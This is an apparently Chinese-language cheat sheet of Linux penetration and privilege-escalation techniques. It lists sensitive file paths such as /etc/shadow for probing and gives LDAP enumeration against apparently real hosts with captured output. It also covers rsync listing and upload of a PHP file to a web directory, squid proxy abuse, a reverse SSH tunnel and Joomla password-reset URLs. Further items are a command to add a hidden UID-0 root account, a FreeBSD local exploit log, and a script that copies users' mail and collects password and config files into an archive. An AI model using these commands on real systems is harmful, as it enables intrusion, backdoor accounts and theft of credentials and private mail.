Linux 系统下的一些常见路径:
/etc/passwd /etc/shadow /etc/fstab /etc/host.conf /etc/motd /etc/ld.so.conf /var/www/htdocs/index.php /var/www/conf/httpd.conf /var/www/htdocs/index.html /var/httpd/conf/php.ini /var/httpd/htdocs/index.php /var/httpd/conf/httpd.conf /var/httpd/htdocs/index.html /var/httpd/conf/php.ini /var/www/index.html /var/www/index.php /opt/www/conf/httpd.conf /opt/www/htdocs/index.php /opt/www/htdocs/index.html /usr/local/apache/htdocs/index.html /usr/local/apache/htdocs/index.php /usr/local/apache2/htdocs/index.html /usr/local/apache2/htdocs/index.php /usr/local/httpd2.2/htdocs/index.php /usr/local/httpd2.2/htdocs/index.html /tmp/apache/htdocs/index.html /tmp/apache/htdocs/index.php /etc/httpd/htdocs/index.php /etc/httpd/conf/httpd.conf /etc/httpd/htdocs/index.html /www/php/php.ini /www/php4/php.ini /www/php5/php.ini /www/conf/httpd.conf /www/htdocs/index.php /www/htdocs/index.html /usr/local/httpd/conf/httpd.conf /apache/apache/conf/httpd.conf /apache/apache2/conf/httpd.conf /etc/apache/apache.conf /etc/apache2/apache.conf /etc/apache/httpd.conf /etc/apache2/httpd.conf /etc/apache2/vhosts.d/00_default_vhost.conf /etc/apache2/sites-available/default /etc/phpmyadmin/config.inc.php /etc/mysql/my.cnf /etc/httpd/conf.d/php.conf /etc/httpd/conf.d/httpd.conf /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/logs/access_log /etc/httpd/logs/access.log /home/apache/conf/httpd.conf /home/apache2/conf/httpd.conf /var/log/apache/error_log /var/log/apache/error.log /var/log/apache/access_log /var/log/apache/access.log /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache2/access_log /var/log/apache2/access.log /var/www/logs/error_log /var/www/logs/error.log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/error_log /usr/local/apache/logs/error.log /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /var/log/error_log /var/log/error.log /var/log/access_log /var/log/access.log /usr/local/apache/logs/access_logaccess_log.old /usr/local/apache/logs/error_logerror_log.old /etc/php.ini /bin/php.ini /etc/init.d/httpd /etc/init.d/mysql /etc/httpd/php.ini /usr/lib/php.ini /usr/lib/php/php.ini /usr/local/etc/php.ini /usr/local/lib/php.ini /usr/local/php/lib/php.ini /usr/local/php4/lib/php.ini /usr/local/php4/php.ini /usr/local/php4/lib/php.ini /usr/local/php5/lib/php.ini /usr/local/php5/etc/php.ini /usr/local/php5/php5.ini /usr/local/apache/conf/php.ini /usr/local/apache/conf/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache2/conf/php.ini /etc/php4.4/fcgi/php.ini /etc/php4/apache/php.ini /etc/php4/apache2/php.ini /etc/php5/apache/php.ini /etc/php5/apache2/php.ini /etc/php/php.ini /etc/php/php4/php.ini /etc/php/apache/php.ini /etc/php/apache2/php.ini /web/conf/php.ini /usr/local/Zend/etc/php.ini /opt/xampp/etc/php.ini /var/local/www/conf/php.ini /var/local/www/conf/httpd.conf /etc/php/cgi/php.ini /etc/php4/cgi/php.ini /etc/php5/cgi/php.ini /php5/php.ini /php4/php.ini /php/php.ini /PHP/php.ini /apache/php/php.ini /xampp/apache/bin/php.ini /xampp/apache/conf/httpd.conf /NetServer/bin/stable/apache/php.ini /home2/bin/stable/apache/php.ini /home/bin/stable/apache/php.ini /var/log/mysql/mysql-bin.log /var/log/mysql.log /var/log/mysqlderror.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/mysql.log /var/lib/mysql/my.cnf /usr/local/mysql/my.cnf /usr/local/mysql/bin/mysql /etc/mysql/my.cnf /etc/my.cnf /usr/local/cpanel/logs /usr/local/cpanel/logs/stats_log /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log /usr/local/share/examples/php4/php.ini /usr/local/share/examples/php/php.ini /usr/local/tomcat5527/bin/version.sh /usr/share/tomcat6/bin/startup.sh /usr/tomcat6/bin/startup.sh
liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式
2.less /etc/ldap.conf base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
3.查找管理员信息
匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
实战:
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式
2.less /etc/ldap.conf base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
3.查找管理员信息
匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
渗透实战:
1.返回所有的属性
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*" version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain dn: uid=manager,dc=ruc,dc=edu,dc=cn uid: manager objectClass: inetOrgPerson objectClass: organizationalPerson objectClass: person objectClass: top sn: manager cn: manager dn: uid=superadmin,dc=ruc,dc=edu,dc=cn uid: superadmin objectClass: inetOrgPerson objectClass: organizationalPerson objectClass: person objectClass: top sn: superadmin cn: superadmin dn: uid=admin,dc=ruc,dc=edu,dc=cn uid: admin objectClass: inetOrgPerson objectClass: organizationalPerson objectClass: person objectClass: top sn: admin cn: admin dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn uid: dcp_anonymous objectClass: top objectClass: person objectClass: organizationalPerson objectClass: inetOrgPerson sn: dcp_anonymous cn: dcp_anonymous
2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain
3.查找
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*" version: 1 dn: objectClass: top namingContexts: dc=ruc,dc=edu,dc=cn supportedExtension: 2.16.840.1.113730.3.5.7 supportedExtension: 2.16.840.1.113730.3.5.8 supportedExtension: 1.3.6.1.4.1.4203.1.11.1 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25 supportedExtension: 2.16.840.1.113730.3.5.3 supportedExtension: 2.16.840.1.113730.3.5.5 supportedExtension: 2.16.840.1.113730.3.5.6 supportedExtension: 2.16.840.1.113730.3.5.4 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24 supportedExtension: 1.3.6.1.4.1.1466.20037 supportedExtension: 1.3.6.1.4.1.4203.1.11.3 supportedControl: 2.16.840.1.113730.3.4.2 supportedControl: 2.16.840.1.113730.3.4.3 supportedControl: 2.16.840.1.113730.3.4.4 supportedControl: 2.16.840.1.113730.3.4.5 supportedControl: 1.2.840.113556.1.4.473 supportedControl: 2.16.840.1.113730.3.4.9 supportedControl: 2.16.840.1.113730.3.4.16 supportedControl: 2.16.840.1.113730.3.4.15 supportedControl: 2.16.840.1.113730.3.4.17 supportedControl: 2.16.840.1.113730.3.4.19 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1 supportedControl: 2.16.840.1.113730.3.4.14 supportedControl: 1.3.6.1.4.1.1466.29539.12 supportedControl: 2.16.840.1.113730.3.4.12 supportedControl: 2.16.840.1.113730.3.4.18 supportedControl: 2.16.840.1.113730.3.4.13 supportedSASLMechanisms: EXTERNAL supportedSASLMechanisms: DIGEST-MD5 supportedLDAPVersion: 2 supportedLDAPVersion: 3 vendorName: Sun Microsystems, Inc. vendorVersion: Sun-Java(tm)-System-Directory/6.2 dataversion: 020090516011411 netscapemdsuffix: cn=ldap://dc=webA:389 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5 supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5 supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5 supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5 supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5 supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5 supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:
列举IP:
showmount -e ip
liunx 相关提权渗透技巧总结,三、rsync渗透技巧:
1.查看rsync服务器上的列表:
rsync 210.51.X.X:: finance img_finance auto img_auto html_cms img_cms ent_cms ent_img ceshi res_img res_img_c2 chip chip_c2 ent_icms games gamesimg media mediaimg fashion res-fashion res-fo taobao-home res-taobao-home house res-house res-home res-edu res-ent res-labs res-news res-phtv res-media home edu news res-book
看相应的下级目录(注意一定要在目录后面添加上/)
rsync 210.51.X.X::htdocs_app/ rsync 210.51.X.X::auto/ rsync 210.51.X.X::edu/
2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/ http://app.finance.xxx.com/warn/nothack.txt
liunx 相关提权渗透技巧总结,四、squid渗透技巧:
nc -vv 80 GET HTTP://www.sina.com / HTTP/1.0 GET HTTP://WWW.sina.com:22 / HTTP/1.0
liunx 相关提权渗透技巧总结,五、SSH端口转发:
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:
确定版本:
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47
重新设置密码:
index.php?option=com_user&view=reset&layout=confirm
liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:
useradd -o -u 0 nothack
liunx 相关提权渗透技巧总结,八、freebsd本地提权:
[argp@julius ~]$ uname -rsi * freebsd 7.3-RELEASE GENERIC * [argp@julius ~]$ sysctl vfs.usermount * vfs.usermount: 1 * [argp@julius ~]$ id * uid=1001(argp) gid=1001(argp) groups=1001(argp) * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex * [argp@julius ~]$ ./nfs_mount_ex * calling nmount()
tar 文件夹打包:
1、tar打包:
tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif 排除目录 /xx/xx/* alzip打包(韩国) alzip -a D:/WEB d:/web*.rar
{
注:
关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压
那么用这条比较好
tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*
}
系统信息收集:
for linux: #!/bin/bash echo #######geting sysinfo#### echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt echo #######basic infomation## cat /proc/meminfo echo cat /proc/cpuinfo echo rpm -qa 2>/dev/null ######stole the mail......###### cp -a /var/mail /tmp/getmail 2>/dev/null echo 'u'r id is' `id` echo ###atq&crontab##### atq crontab -l echo #####about var##### set echo #####about network### ####this is then point in pentest,but i am a new bird,so u need to add some in it cat /etc/hosts hostname ipconfig -a arp -v echo ########user#### cat /etc/passwd|grep -i sh echo ######service#### chkconfig --list for i in {oracle,mysql,tomcat,samba,apache,ftp} cat /etc/passwd|grep -i $i done locate passwd >/tmp/password 2>/dev/null sleep 5 locate password >>/tmp/password 2>/dev/null sleep 5 locate conf >/tmp/sysconfig 2>dev/null sleep 5 locate config >>/tmp/sysconfig 2>/dev/null sleep 5 ###maybe can use "tree /"### echo ##packing up######### tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig rm -rf /tmp/getmail /tmp/password /tmp/sysconfig